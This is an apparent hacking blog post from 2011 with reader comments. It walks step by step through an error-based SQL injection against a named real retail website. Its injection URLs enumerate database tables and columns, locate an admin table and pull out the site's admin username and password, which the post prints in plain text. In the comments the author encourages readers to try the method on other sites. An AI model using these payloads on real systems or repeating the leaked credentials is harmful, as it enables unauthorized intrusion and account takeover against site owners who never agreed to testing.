Hack ASPX Websites With SQL Injections

Sunday, July 3, 2011 // by Hacking Beast Editor // Labels: Cyber Security, database, ddos, defacements, hacking, keylogger, knodledge, tips and tricks, website hacking // 3 comments

Vulnerable link:

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton

Step 1:

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--

The above query gives a "Page not Found" error. Hence we use the following link for rest of the queries:

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535

Step 2: Finding the column names

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1

The selected text represents the column names.

Step 3: Finding the table names

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert

(int,(select top 1 table_name from information_schema.tables))

Here the highlighted text is the first table in the database. But we are
interested in finding the admin table. So lets try to find the next table in the database.

So the next query is:

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert

(int,(select top 1 table_name from information_schema.tables where 

table_name not in ('Tab_FinalOrder')))

So the name of the admin table is "AdminMaster"

Step 4: To find the columns in "AdminMaster" table

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert

(int,(select top 1 column_name from information_schema.

columns where table_name = 'AdminMaster'))

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert

(int,(select top 1 column_name from information_schema.columns 

where table_name = 'AdminMaster' and column_name not 

in ('Admin_name')))

Column names: "Admin_name" and "Admin_password"





Step 5: Finding the username and password

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(

int,(select top 1 Admin_name from AdminMaster))

Code:

http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert

(int,(select top 1 Admin_password from AdminMaster))

Username: admin
Password: pothys!@#

[+] Share & Bookmark • Twitter • Stumbleupon • Digg • Delicious • Facebook

3 comments:

• 
  Unknown
  February 15, 2012 at 8:18 AM

  ITS nt a vuln site..dude.

• 
  Hacking Beast Editor
  February 17, 2012 at 7:12 AM

  @Akshay bro. it might be possible that admin has fixed up the website try this method on other sites... it will surely work ;)

• 
  CryptBala
  April 13, 2012 at 8:42 PM

  Hi There I need to copy all pictures displayed in the website with minimal effort.. let me explain you what i mean..
  
  for instance i am accesing this link
  http://raagalahari.com/localevents/3560/kismet-pub-hyd-apr-7-2012.aspx
  As you can see there are 50 images in this page.. now what i need to do is i need all the 50 images in its original resolution... let show you http://raagalahari.com/localevents/3560/kismet-pub-hyd-apr-7-2012/image9.aspx
  
  NOw this shows only one image.. its difficult for me to click on the thumbnail of each and every picture to save all of them to my local drive.. now what i really need is when i go to the source of the page i was able to see where the file is actually located. the location is <img src="http://img.raagalahari.com/april2012/pubs/kismet-april-7-2012/kismet-april-7-20128t.jpg"
  
  What i really need is access to <img src="http://img.raagalahari.com/april2012/pubs/kismet-april-7-2012/
  so that i can save all of them in 1 shot.. how can i save all of them with minimal effort.. please help me out.. thanks...